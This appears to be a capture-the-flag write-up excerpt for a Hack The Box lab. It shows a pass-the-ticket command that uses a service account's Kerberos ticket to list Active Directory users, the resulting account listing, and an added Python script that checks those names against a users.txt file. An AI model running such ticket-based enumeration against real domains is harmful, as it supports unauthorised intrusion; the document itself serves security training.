Username Extraction
Extracting domain users through the pass_the_ticket technique with the TGT of the sql_svc user
┌──(kali㉿kali)-[~/archive/htb/labs/escape]
└─$ KRB5CCNAME=sql_svc.ccache impacket-GetADUsers SEQUEL.HTB/sql_svc -dc-ip $IP -k -no-pass -all
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Querying DC for information about domain.
Name                  Email                           PasswordLastSet      LastLogon
--------------------  ------------------------------  -------------------  -------------------
administrator                                         2022-11-18 22:13:16.520281  2023-08-13 03:17:37.111177
Guest                                                 <never>              <never>
krbtgt                                                2022-11-18 18:12:10.132527  <never>
tom.henn                                              2022-11-18 22:13:12.991127  <never>
brandon.brown                                         2022-11-18 22:13:13.047440  <never>
ryan.cooper                                           2023-02-01 22:52:57.246550  2023-02-07 18:13:56.485457
sql_svc                                               2022-11-18 22:13:13.102329  2023-08-13 04:53:27.631875
james.roberts                                         2022-11-18 22:13:13.133415  <never>
nicole.thompson                                       2022-11-18 22:13:13.163173  <never>
Those users match the ones from the earlier extraction saved to the users.txt file
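
Added example, not part of the original notes: a small parser for the GetADUsers listing above that checks the account names against a users.txt body instead of comparing by eye. The function names and the users.txt content are assumptions made for illustration; the rows are a trimmed copy of the listing.

```python
import re

# Time fields are either "<never>" or "YYYY-MM-DD HH:MM:SS.ffffff".
TS = r"(?:<never>|\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}(?:\.\d+)?)"
# Anchor on the two trailing time fields so the optional Email column and
# collapsed whitespace do not shift the parse. Assumes names without spaces.
ROW = re.compile(
    rf"^(?P<name>\S+)\s+(?:(?P<email>\S+@\S+)\s+)?(?P<pwd_set>{TS})\s+(?P<logon>{TS})\s*$"
)

# Rows copied from the listing above (trimmed to four accounts).
SAMPLE_OUTPUT = """\
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Querying DC for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Guest <never> <never>
krbtgt 2022-11-18 18:12:10.132527 <never>
ryan.cooper 2023-02-01 22:52:57.246550 2023-02-07 18:13:56.485457
sql_svc 2022-11-18 22:13:13.102329 2023-08-13 04:53:27.631875
"""

# Constructed users.txt content; "example.user" is a made-up entry.
SAMPLE_USERS_TXT = "Ryan.Cooper\nsql_svc\nexample.user\n\n"


def parse_getadusers(text):
    """Return one dict per account row; banner, header and rule lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if m:
            rows.append(m.groupdict())
    return rows


def compare(rows, users_txt):
    """Case-insensitive set difference between parsed names and a users.txt body."""
    listed = {u.strip().lower() for u in users_txt.splitlines() if u.strip()}
    found = {r["name"].lower() for r in rows}
    return sorted(found - listed), sorted(listed - found)


if __name__ == "__main__":
    only_in_directory, only_in_file = compare(parse_getadusers(SAMPLE_OUTPUT), SAMPLE_USERS_TXT)
    print("in directory, not in users.txt:", only_in_directory)
    print("in users.txt, not in directory:", only_in_file)
```

Two empty lists mean the two extractions agree; the comparison is case-insensitive because account names are.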